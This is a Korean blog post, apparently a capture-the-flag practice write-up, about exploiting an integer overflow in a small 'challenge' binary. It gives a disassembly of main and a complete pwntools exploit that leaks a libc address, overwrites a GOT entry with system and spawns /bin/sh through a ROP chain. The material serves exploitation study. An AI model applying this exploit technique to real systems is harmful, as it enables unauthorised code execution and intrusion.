728x90
반응형
실행
바이너리를 실행하면 정수를 입력할 수 있고 여기서 integer overflow 가 발생한다.
그 이후에 comment 를 입력할 수 있는데
그냥 일반적인 입력에서는 ret 를 조작할 수 없다.
그래서
-2147483648 를 입력해주면
이후 comment 를 입력하는 부분에서 sub 1 을 해줘서 양수로 바뀐다.
이후는 그냥 rop 하면 된다.
gef➤ disass main
Dump of assembler code for function main:
0x00000000004012ad <+0>: endbr64
0x00000000004012b1 <+4>: push rbp
0x00000000004012b2 <+5>: mov rbp,rsp
0x00000000004012b5 <+8>: sub rsp,0x70
0x00000000004012b9 <+12>: mov DWORD PTR [rbp-0x4],0x0
0x00000000004012c0 <+19>: lea rax,[rip+0xd41] # 0x402008
0x00000000004012c7 <+26>: mov rdi,rax
0x00000000004012ca <+29>: call 0x4010b0 <puts@plt>
0x00000000004012cf <+34>: lea rax,[rip+0xd4f] # 0x402025
0x00000000004012d6 <+41>: mov rdi,rax
0x00000000004012d9 <+44>: mov eax,0x0
0x00000000004012de <+49>: call 0x4010c0 <printf@plt>
0x00000000004012e3 <+54>: lea rax,[rbp-0x4]
0x00000000004012e7 <+58>: mov rsi,rax
0x00000000004012ea <+61>: lea rax,[rip+0xd39] # 0x40202a
0x00000000004012f1 <+68>: mov rdi,rax
0x00000000004012f4 <+71>: mov eax,0x0
0x00000000004012f9 <+76>: call 0x401110 <__isoc99_scanf@plt>
0x00000000004012fe <+81>: mov eax,DWORD PTR [rbp-0x4]
0x0000000000401301 <+84>: cmp eax,0x64
0x0000000000401304 <+87>: jle 0x40131c <main+111>
0x0000000000401306 <+89>: lea rax,[rip+0xd23] # 0x402030
0x000000000040130d <+96>: mov rdi,rax
0x0000000000401310 <+99>: call 0x4010b0 <puts@plt>
0x0000000000401315 <+104>: mov eax,0x0
0x000000000040131a <+109>: jmp 0x401372 <main+197>
0x000000000040131c <+111>: mov eax,DWORD PTR [rbp-0x4]
0x000000000040131f <+114>: mov esi,eax
0x0000000000401321 <+116>: lea rax,[rip+0xd2c] # 0x402054
0x0000000000401328 <+123>: mov rdi,rax
0x000000000040132b <+126>: mov eax,0x0
0x0000000000401330 <+131>: call 0x4010c0 <printf@plt>
0x0000000000401335 <+136>: lea rax,[rip+0xd2c] # 0x402068
0x000000000040133c <+143>: mov rdi,rax
0x000000000040133f <+146>: call 0x4010b0 <puts@plt>
0x0000000000401344 <+151>: mov eax,DWORD PTR [rbp-0x4]
0x0000000000401347 <+154>: sub eax,0x1
0x000000000040134a <+157>: movsxd rdx,eax
0x000000000040134d <+160>: lea rax,[rbp-0x70]
0x0000000000401351 <+164>: mov rsi,rax
0x0000000000401354 <+167>: mov edi,0x0
0x0000000000401359 <+172>: call 0x4010e0 <read@plt>
0x000000000040135e <+177>: lea rax,[rip+0xd22] # 0x402087
0x0000000000401365 <+184>: mov rdi,rax
0x0000000000401368 <+187>: call 0x4010b0 <puts@plt>
0x000000000040136d <+192>: mov eax,0x0
0x0000000000401372 <+197>: leave
0x0000000000401373 <+198>: ret
End of assembler dump.from pwn import *
p = process("./challenge")
e = ELF("./challenge")
r = ROP("./challenge")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# context.log_level = 'debug'
# pause()
# -2147483648
p.sendlineafter(b".\n", b'-2147483648')
binsh = b"/bin/sh\x00"
bss = 0x404070
prdi = 0x00401237
ppr = 0x00401236 # pop rsi; pop rdi; ret
pppr = 0x00401235 # pop rdx; pop rsi; pop rdi; ret
puts_got = 0x404018
puts_plt = 0x4010b0
payload = b'a' * 0x78
payload += p64(prdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(pppr) # pop rdx; pop rsi; pop rdi; ret
payload += p64(len(str(binsh)))
payload += p64(bss)
payload += p64(0)
payload += p64(e.plt['read'])
payload += p64(pppr) # pop rdx; pop rsi; pop rdi; ret
payload += p64(8)
payload += p64(puts_got)
payload += p64(0)
payload += p64(e.plt['read'])
payload += p64(prdi)
payload += p64(0x404070)
payload += p64(puts_plt)
p.sendafter(b"t.\n", payload)
p.recvuntil(b'[*] Thank you!\n')
puts_addr = u64((p.recvn(6)).ljust(8,b"\x00"))
print(hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base", hex(libc_base))
system_addr = libc_base + libc.symbols['system']
print(hex(system_addr))
p.send(binsh)
p.send(p64(system_addr))
p.interactive()
이 글은 옵시디언을 이용해서 작성되었습니다.
728x90
반응형
'TOOR' 카테고리의 다른 글
| [TOOR] 13.1. PIE (0) | 2023.09.29 |
|---|---|
| [TOOR] 12.3. SROP (0) | 2023.09.24 |
| [TOOR] 12.1. ROP & ropasaurusrex write_up (0) | 2023.09.24 |
| [TOOR] 11.2. One (Shot) gadget (0) | 2023.09.24 |
| [TOOR] 11.1. GOT Overwrite (0) | 2023.09.24 |
